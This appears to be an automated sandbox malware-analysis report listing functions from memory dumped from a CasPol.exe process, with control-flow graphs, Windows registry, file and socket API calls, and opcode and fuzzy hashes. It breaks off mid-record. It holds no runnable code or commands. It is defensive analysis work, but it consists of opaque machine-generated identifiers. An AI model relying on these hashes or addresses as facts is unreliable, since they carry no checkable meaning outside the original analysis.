                                          control_flow_graph 2667 cd4b20-cd4b25 2668 cd4aeb-cd4aec 2667->2668 2669 cd4b27-cd4b82 2667->2669 2670 cd4af1-cd4af4 2668->2670 2708 cd4b89-cd4ba0 LdrInitializeThunk 2669->2708 2672 cd4af6-cd4afe 2670->2672 2673 cd4b03-cd4b05 2670->2673 2672->2673 2674 cd4b0c-cd4b0f 2673->2674 2675 cd4b07 2673->2675 2678 cd4b15-cd4b1c 2674->2678 2679 cd4a11-cd4a14 2674->2679 2675->2674 2680 cd4a25-cd4a28 2679->2680 2681 cd4a16-cd4a1a 2679->2681 2684 cd4a3d-cd4a40 2680->2684 2685 cd4a2a-cd4a38 2680->2685 2681->2678 2683 cd4a20 2681->2683 2683->2680 2686 cd4a52-cd4a55 2684->2686 2687 cd4a42-cd4a4d 2684->2687 2685->2684 2689 cd4a64-cd4a67 2686->2689 2690 cd4a57-cd4a5f 2686->2690 2687->2686 2691 cd4a69-cd4a71 2689->2691 2692 cd4a76-cd4a79 2689->2692 2690->2689 2691->2692 2693 cd4a7b 2692->2693 2694 cd4a80-cd4a83 2692->2694 2693->2694 2698 cd4a85-cd4a89 2694->2698 2699 cd4a90-cd4a93 2694->2699 2700 cd4ade-cd4aec 2698->2700 2701 cd4a8b 2698->2701 2702 cd4a95-cd4a9d 2699->2702 2703 cd4aa2-cd4aa5 2699->2703 2700->2670 2701->2699 2702->2703 2705 cd4ab9-cd4abc 2703->2705 2706 cd4aa7-cd4ab4 2703->2706 2709 cd4abe-cd4ac0 2705->2709 2710 cd4acb-cd4ace 2705->2710 2706->2705 2714 cd4ced-cd4d12 2708->2714 2715 cd4ba6-cd4bc4 2708->2715 2709->2685 2711 cd4ac6 2709->2711 2712 cd4ad9-cd4adc 2710->2712 2713 cd4ad0-cd4ad2 2710->2713 2711->2710 2712->2670 2712->2700 2713->2706 2716 cd4ad4 2713->2716 2729 cd4d17-cd4d20 2714->2729 2715->2714 2719 cd4bca-cd4be4 2715->2719 2716->2712 2722 cd4bea 2719->2722 2723 cd4be6-cd4be8 2719->2723 2725 cd4bed-cd4c46 2722->2725 2723->2725 2735 cd4c4c 2725->2735 2736 cd4c48-cd4c4a 2725->2736 2737 cd4c4f-cd4ceb 2735->2737 2736->2737 2737->2729
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: L.r$L.r
                                          • API String ID: 2994545307-3620355741
                                          • Opcode ID: 4b501cf2a1bb8800e163d68b420ebc81d9874a6f87365ae75b499a99ce30a91b
                                          • Instruction ID: 8aeac34bf7265848a50a1a7b2a0c6130bf23c10f1bd8ef7b4fb71676f2044fa4
                                          • Opcode Fuzzy Hash: 4b501cf2a1bb8800e163d68b420ebc81d9874a6f87365ae75b499a99ce30a91b
                                          • Instruction Fuzzy Hash: 24519375B002059FDB14DBB8D884BAEB7B5EF88304F20853AE61ADB294DB34EC45C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CD4B30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2755 cd4b30-cd4ba0 LdrInitializeThunk 2763 cd4ced-cd4d12 2755->2763 2764 cd4ba6-cd4bc4 2755->2764 2777 cd4d17-cd4d20 2763->2777 2764->2763 2767 cd4bca-cd4be4 2764->2767 2770 cd4bea 2767->2770 2771 cd4be6-cd4be8 2767->2771 2773 cd4bed-cd4c46 2770->2773 2771->2773 2783 cd4c4c 2773->2783 2784 cd4c48-cd4c4a 2773->2784 2785 cd4c4f-cd4ceb 2783->2785 2784->2785 2785->2777
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: L.r$L.r
                                          • API String ID: 2994545307-3620355741
                                          • Opcode ID: dd6ac9ebbc4745aaaae0f10a270ef2ad4883015bd8ebb92cab47cebd61e7ec37
                                          • Instruction ID: 8ae5613117d117f10bcb66ef8777ceeeb361a4303950944b8d31c71edb5ed013
                                          • Opcode Fuzzy Hash: dd6ac9ebbc4745aaaae0f10a270ef2ad4883015bd8ebb92cab47cebd61e7ec37
                                          • Instruction Fuzzy Hash: 45518575B002059FDB04EBB4C884AAEB7F6AF88304B258539E606DB394DF34ED45C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC2CC4 Relevance: 4.5, Strings: 3, Instructions: 701COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or
                                          • API String ID: 0-1528748740
                                          • Opcode ID: 9589706d180604f49aba61477f4a2d1c1842d35cb94f8898dfe930cbb1d65cf8
                                          • Instruction ID: c3704ce3db09c6f09d6791334d1f6a79c5bd2ebe31ac7e738cd0840f4c1abca7
                                          • Opcode Fuzzy Hash: 9589706d180604f49aba61477f4a2d1c1842d35cb94f8898dfe930cbb1d65cf8
                                          • Instruction Fuzzy Hash: 0542D5347083859FE712DB68D858B697BF2AF86300F19C4EAD448DF2A2DA34DD4AC751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822A27 Relevance: 2.0, APIs: 1, Instructions: 500COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: bd0bdb1921146d125b28649cccfe401d1d9d8bcfa878377540bbcfb369543229
                                          • Instruction ID: 5adf02a9b231346d7047b33ecdcc6f4c63f932aa786cc082e1d5dfa816c52465
                                          • Opcode Fuzzy Hash: bd0bdb1921146d125b28649cccfe401d1d9d8bcfa878377540bbcfb369543229
                                          • Instruction Fuzzy Hash: B8422678A45268CFDBA1DF68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822A57 Relevance: 2.0, APIs: 1, Instructions: 497COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: ec623b3d89d506f7cfce53f8eb861420a338061f53000ab993c2efa52141fe0c
                                          • Instruction ID: 5d9c3d10802fb753ef41636c973deadfb8af68df1e4e064eb4877cd7167cc827
                                          • Opcode Fuzzy Hash: ec623b3d89d506f7cfce53f8eb861420a338061f53000ab993c2efa52141fe0c
                                          • Instruction Fuzzy Hash: D9422678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6E80DA7314DA709EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822AAB Relevance: 2.0, APIs: 1, Instructions: 487COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 30f608bcdf07588eb3211963afef1237894feb0f4b2799120ea9170aad807b77
                                          • Instruction ID: fbdb1fd53711479b929a68e2f677fabd3b8da23ee73702de0379fda1807cfe0f
                                          • Opcode Fuzzy Hash: 30f608bcdf07588eb3211963afef1237894feb0f4b2799120ea9170aad807b77
                                          • Instruction Fuzzy Hash: B5421678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822AFF Relevance: 2.0, APIs: 1, Instructions: 475COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 422ff410029ce95edf7f860f529e2aa7bc0cefc981483df512d1b5d1d1336679
                                          • Instruction ID: 1aedbc5c76c5b2c6f9255cfb36a32263e9a2fdcd6d2a9327a3b9d5556faa5ec4
                                          • Opcode Fuzzy Hash: 422ff410029ce95edf7f860f529e2aa7bc0cefc981483df512d1b5d1d1336679
                                          • Instruction Fuzzy Hash: CE321678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822B4A Relevance: 2.0, APIs: 1, Instructions: 467COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: cadd9a4e68f5d712cbca0de215227bf79b53ff86f4cede955462a258dd82824f
                                          • Instruction ID: 7771147f1298ed5adf0f44db0d18695fd6e89707752578e42fdec46474135d1d
                                          • Opcode Fuzzy Hash: cadd9a4e68f5d712cbca0de215227bf79b53ff86f4cede955462a258dd82824f
                                          • Instruction Fuzzy Hash: D4321678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822B9E Relevance: 2.0, APIs: 1, Instructions: 457COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 11ec8a5e68848bec1af961fc61ae0b45b7d7795fbce4ab6d4fd6376506384ea9
                                          • Instruction ID: 87cda498b49b34b41c226e341bfa478d8ff67183cd9b4728a7cb856e3ca47866
                                          • Opcode Fuzzy Hash: 11ec8a5e68848bec1af961fc61ae0b45b7d7795fbce4ab6d4fd6376506384ea9
                                          • Instruction Fuzzy Hash: F9321678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DB319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F822BF2 Relevance: 1.9, APIs: 1, Instructions: 447COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 4343a7c9e454a3f825b5e6f6dd4feb389244236a314fae822e3ed3f82072a303
                                          • Instruction ID: 0158eb10a2872f563c6f6c2e5871e1cbd2537d4480feee11169ecf24d4d6bcc6
                                          • Opcode Fuzzy Hash: 4343a7c9e454a3f825b5e6f6dd4feb389244236a314fae822e3ed3f82072a303
                                          • Instruction Fuzzy Hash: 74321578A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319E81CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CDB558 Relevance: 1.6, APIs: 1, Instructions: 122libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5874e8c19ed5f96c9b081c4d62b7468342e099ec30ea9f1812e863a523d9d2a7
                                          • Instruction ID: 7f9b16831f3924bfb430027928e3f6b44c5e66bb271ebd6756e1788f459a469e
                                          • Opcode Fuzzy Hash: 5874e8c19ed5f96c9b081c4d62b7468342e099ec30ea9f1812e863a523d9d2a7
                                          • Instruction Fuzzy Hash: 8241AC31A00258DFDB14DFA8C894A9EBBF1EF49311F1184AAD505EB390EB39DC46CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32A8E Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32B45
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: e69086f8a2731ddb701d4d44832a51a17363dd370cd3044b61473d215efe6c17
                                          • Instruction ID: 6e188032d6b1ab1ebdf8dae4a52a1cf936dd1377c575662629c76b87d36dd93b
                                          • Opcode Fuzzy Hash: e69086f8a2731ddb701d4d44832a51a17363dd370cd3044b61473d215efe6c17
                                          • Instruction Fuzzy Hash: 363181B2504384AFE7128F65DC44FA6BBACEF45710F0489AAE9859F142D274E909CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE333DF Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          • getaddrinfo.WS2_32(?,00000EA4), ref: 1FE334B3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: getaddrinfo
                                          • String ID:
                                          • API String ID: 300660673-0
                                          • Opcode ID: a32bd1780021b167318c168d612ca5599f5ebd980239c703af0dcfe78abc0654
                                          • Instruction ID: e2dc73ec4c50611dcb0392ee022aa67468345f6ef5a95b6614b87eddb629637f
                                          • Opcode Fuzzy Hash: a32bd1780021b167318c168d612ca5599f5ebd980239c703af0dcfe78abc0654
                                          • Instruction Fuzzy Hash: 1531A3B1404384AFF722CB64CC85FA6FBBCEF06310F04859AF9849F182D275A549CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31904 Relevance: 1.6, APIs: 1, Instructions: 95networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 1FE319B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Socket
                                          • String ID:
                                          • API String ID: 38366605-0
                                          • Opcode ID: 0873215645497e88313b005f6bb16a21d9c046cfd7a9ba158700abf2c572ae86
                                          • Instruction ID: 855577cfb79002fd01684357fb19ab37e3910da89aac936c0c8a6e559c0f6145
                                          • Opcode Fuzzy Hash: 0873215645497e88313b005f6bb16a21d9c046cfd7a9ba158700abf2c572ae86
                                          • Instruction Fuzzy Hash: 113183718093C0AFE7138F65DC45B56BFB4EF06214F0885DFE9858F1A3D269A908CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE314CB Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31580
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 5d28ee96412c80f4a2624ebbf5f3bfa8cccfddb290c17bd43b3d22549a416ba3
                                          • Instruction ID: e0a4727f9e7d7c3174d38dc8754677e3566acadba7f04db855cfee35d0806bc1
                                          • Opcode Fuzzy Hash: 5d28ee96412c80f4a2624ebbf5f3bfa8cccfddb290c17bd43b3d22549a416ba3
                                          • Instruction Fuzzy Hash: 49319572509380AFE712CF60DC84F96BFB8EF46310F08859AE9859F193D265E508CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32C8E Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32D3A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: c6bdfd616cc0fa86e6d2fd840ca77c90718bf51048674e0225103d4771775c65
                                          • Instruction ID: 741a59f6f76328095567c14b1be5cc61824f86fc39f3d2bed88babbe53a69f2d
                                          • Opcode Fuzzy Hash: c6bdfd616cc0fa86e6d2fd840ca77c90718bf51048674e0225103d4771775c65
                                          • Instruction Fuzzy Hash: 97319FB2509784AFE7128B64DC45F66FFB8EF46310F08849AED849F253D225A909C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3260D Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAIoctl.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE326C1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Ioctl
                                          • String ID:
                                          • API String ID: 3041054344-0
                                          • Opcode ID: dd5bfa92747f7bb002359a382844a23c4e5530be245e12cf96649c5d4288d927
                                          • Instruction ID: f467bf81301023ab380995122687071cfc5e0e4d04d1939382ba3f662d69775c
                                          • Opcode Fuzzy Hash: dd5bfa92747f7bb002359a382844a23c4e5530be245e12cf96649c5d4288d927
                                          • Instruction Fuzzy Hash: ED317075505780AFEB12CF11DC84F96FFB8EF0A314F08859AE9858B162D335E909DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE30786 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileType.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE30831
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          • Opcode ID: bee67539c005906f6fa6c8b329ec1398b90cfb34cc22cffbe068cee07bedbe1f
                                          • Instruction ID: b0558fc8823e949165943f855417925eeb53befd1f898682d04d0e1b17373e94
                                          • Opcode Fuzzy Hash: bee67539c005906f6fa6c8b329ec1398b90cfb34cc22cffbe068cee07bedbe1f
                                          • Instruction Fuzzy Hash: E3313A7544E3C0AFE3138B219C55B52BFB8DF47214F1A81DBE9848F1A3D269A909C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3054C Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1FE305ED
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: acc6cde1abfbb899181e04d2f141ae38189b01735f7b69f1f2ec6ec4f56c4a34
                                          • Instruction ID: 65e8c5e632d9af852070e960fc6c22384d2a2ee90c0674d49a827ca763b69f1f
                                          • Opcode Fuzzy Hash: acc6cde1abfbb899181e04d2f141ae38189b01735f7b69f1f2ec6ec4f56c4a34
                                          • Instruction Fuzzy Hash: 39319071504380AFE721CF65DC44F62BFE8EF09214F08859AE9848B292D375F409CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A519 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D45A5C9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 95d8f7fe0312743921eee6e85796bea9da8a432e75f387b997c341244a7397b9
                                          • Instruction ID: 1426b26721e21f510ae20884aa11a5a831ec5bfb0900758d26288cfca26a9c3b
                                          • Opcode Fuzzy Hash: 95d8f7fe0312743921eee6e85796bea9da8a432e75f387b997c341244a7397b9
                                          • Instruction Fuzzy Hash: D331A276509384AFE7128B25DC85F67FFBCEF05210F08859AF985CB152D224A948CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31D2C Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA4), ref: 1FE31DC3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: fa51149d560c4446af95e88d55a61429265163668cbe2437768b7533b417cea3
                                          • Instruction ID: 6133b782b444c2b7a2bce22e62355ea73a82099ad02f128c732f9d91f3d8509b
                                          • Opcode Fuzzy Hash: fa51149d560c4446af95e88d55a61429265163668cbe2437768b7533b417cea3
                                          • Instruction Fuzzy Hash: 7D31C172504385AFE712CF65DC45FA7FBB8EF45320F0884AAE985DF152D264E808CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45ACEC Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32EnumProcessModules.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AD86
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: EnumModulesProcess
                                          • String ID:
                                          • API String ID: 1082081703-0
                                          • Opcode ID: eca7d0438e57d07d54ff537e653d48e5e924a0a6b43727c6852355ce8aebe66d
                                          • Instruction ID: bf30c4cebcf151d568e83307449af9c539a1928c28000bc74b76f0d218ffd36e
                                          • Opcode Fuzzy Hash: eca7d0438e57d07d54ff537e653d48e5e924a0a6b43727c6852355ce8aebe66d
                                          • Instruction Fuzzy Hash: AF21A7725057C0AFE712CB60DC85F56BFB8EF06320F18859AE985DF153D225A849C771
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A611 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45A6CC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 46408007dee3152b13df864ffecf455f18ad06d9bb005a7e4666e9f9a6af148c
                                          • Instruction ID: 45cf69644fcc28fcccd086573aacfb5bada77737b123ca7ae9b489d88f429444
                                          • Opcode Fuzzy Hash: 46408007dee3152b13df864ffecf455f18ad06d9bb005a7e4666e9f9a6af148c
                                          • Instruction Fuzzy Hash: F3319375105780AFE712CB21CC85F63BFB8EF06310F18849AE985CB253D264E949CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31FC4 Relevance: 1.6, APIs: 1, Instructions: 88fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileView
                                          • String ID:
                                          • API String ID: 3314676101-0
                                          • Opcode ID: 749bd06e79c88f31f1ddfa675f21429f95c9196c802c7f20848655293ba5abe9
                                          • Instruction ID: 88c63402ccff22761a9577d5b33c896452689da47aaa99c6ce84be2226447e90
                                          • Opcode Fuzzy Hash: 749bd06e79c88f31f1ddfa675f21429f95c9196c802c7f20848655293ba5abe9
                                          • Instruction Fuzzy Hash: C0319572405780AFE712CF55DC45F96FFF8EF09324F04859AE9848F252D365A909CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31C2E Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31CD8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: ffb999d19dc1dd3eb91b3197691b3275509b1ef459d33b210d47b692c2ea7978
                                          • Instruction ID: b894e55771331f0745ea572340c2874b752e535e7084ea35d3613f107e171f04
                                          • Opcode Fuzzy Hash: ffb999d19dc1dd3eb91b3197691b3275509b1ef459d33b210d47b692c2ea7978
